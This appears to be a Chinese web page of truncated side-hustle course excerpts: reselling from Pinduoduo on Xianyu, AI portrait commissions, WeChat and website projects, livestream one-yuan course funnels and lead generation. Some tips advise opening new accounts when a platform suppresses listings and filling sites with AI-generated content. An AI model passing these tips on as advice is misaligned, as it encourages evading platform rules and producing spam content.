我们要做的就是做个倒爷，左手倒右手，拼多多倒闲鱼，客户下单，我们下单，客户退货我们退货，客户有疑问，我们也去问卖家，唯一需要注意的就是违J品、侵权、涉及到品牌的我们要注意，还有一个就是尽量去做高利润的，比如一单最少要赚个20元把，我是真心佩服闲鱼那些做低单价的同行，卖便宜的日化的那种，虽然单多，但是利润微薄，一天下来把人都累死了还赚不了多少钱，我建议新手不要做低利润的。做闲鱼要每天要做四件事即可，发产品，擦亮，签到，做闲鱼币任务。就这三样，坚持下去。 如果发的产品没曝光要么就是敏感了，要么就是你的号有问题，换号继续干。一个号跑通后，根据自己情况，适量多号操作，利润翻倍。 4、小红书AI绘画项目 这是基于目前流行的AI衍生出来可落地的项目，根据客户需求将客户发给你的人物照片，利用AI生成2.5D风格、或卡通漫画风格图片发给客户获取报酬，引流也是简单粗暴，直接在小红书多分享点图片就行了，个人介绍里写上支持定制就可以了，有兴趣的粉丝会私信你的。然后我们引导的私域W信来做成交。 5、公众号项目 如果你和我一样，热爱分享、愿意将自己的故事、创业经验、分享给各位屏幕前的陌生人，那么我推荐你也和我一样来做一个知识分享的公众号，你不一定要和我一样做创业，如果你感觉没有别的可写，那么可以做创业公众号，因为创业的公众号变现强。 6、网站项目 为什么要聊这个项目，曾经的web 网站可以说整个互联网全靠它，但是由于中国互联网发展路径与国外产生差异，导致国内应用几乎全部转移到了手机端移动互联网，被APP、小程序取代，各类web 网站、PC软件、被边缘化，被淘汰，甚至是曾经的TOP也纷纷陨落，比如天涯论坛、贴吧，已经很久没听到他们的声音了，这是时代的浪潮，我们没有办法。 但是，我今天却要跟大家聊聊网站这个项目，根据中国互联网发布的网站数据显示，中国互联网web网站正在以每年几十万数量急剧减少，这说明越来越多的站长放弃了网站，我们的竞争对手变少了，再加上在2023年的今天，AI出现了，内容已经完全被解决，不需要我们自己去做磕嘴的伪原创垃圾文章了。 瘦死的骆驼比马大，虽说现在搜索给的流量不多，但是，只要随着时间，收录的页面持续增加，这些可都是真正的免费流量，再加上竞争对手每年都在逐渐减少，内容又被AI解决，所以我认为今年是做网站的最佳机会!放那里稳定更新内容，随着时间的推移，你的网站竞争力只会越来越强。 以上分享的6个项目都没有多大难度，不需要你有资源，有人脉，需要的仅仅是一双手、一台能上网的电脑就能立马开干。 我钱幕是个实在人，说话很直接，我分享的这些项目可以说没毛病，你要能挑出毛病，什么这个项目不好做吧，那个项目红海了吧，只能说明你对赚钱的欲望还不够大，人一旦不想做一件事，能找出一百个理由。这些项目每个都有一堆人在做，他们也是从零一步步坚持过来的，你甚至都还还没开始。其实你更应该扪心自问，到底是什么原因阻碍了你赚钱。 作者：钱幕...

课程内容： 项目介绍 项目流程 注意重点及变现...

这个玩法说白了很简单，就是在直播间帮商家发传单，以前的商家在线下发传单，现在随着直播的爆火，这就有了新的商机。经常刷抖音、视频号直播的应该能刷到，很多直播间小黄车挂着一元课，别看只是一元课，里面福利非常多，很多人随手就买了，毕竟是真便宜这个就是主播在帮商家发传单，每卖一单商家都会给主播几块，甚至几十块的佣金，因为这些付费的都是非常精准的用户，后续商家的成交率都很高。而且这种商家多如牛毛，太多的行业和商家都需要这种精准用户。大家可以涨涨见识，以后刷到这种直播间就不要冲动消费了，后面等你的都是一整个完整的套路。  ...

功能特点： 在线预览图片、视频、音频、文本文件、Markdown 文件、Office 文档等 自动识别目录下的 README.md 文件并展示（类 GitHub） 后台管理可设置网站标题、公告、底部代码等信息 文件搜索功能，支持缓存文件索引 自带第三方文件管理器 支持中文文件名编码设置，解决乱码问题 支持安装在子目录 更新日志： V1.1：优化文件列表表格样式 V1.2：更新了全新的文件管理功能、支持设置目录密码访问 安装方法：上传后直接访问即可使用，后台默认管理员账号密码：admin/123456 左右两侧悬浮广告设置，后台底部代码里面加入以下代码：     ...

玩引流 就要引流精准粉丝 因为精准粉价格高 比如一个鞋子潮牌/护肤/祛痘/粉 普遍一个二十多  占卜 情感等 一个粉就是十几块 你引se粉 磨磨唧唧一天 还不好转化 经常被干微信 还不如一天出几十个精准粉。转化还高 毕竟引流的都是这个领域感兴趣的 废话不多说，引流精准粉的教程思路 拆解来咯 今天主要实操的是引流创业粉，此方法可以引流全部行业....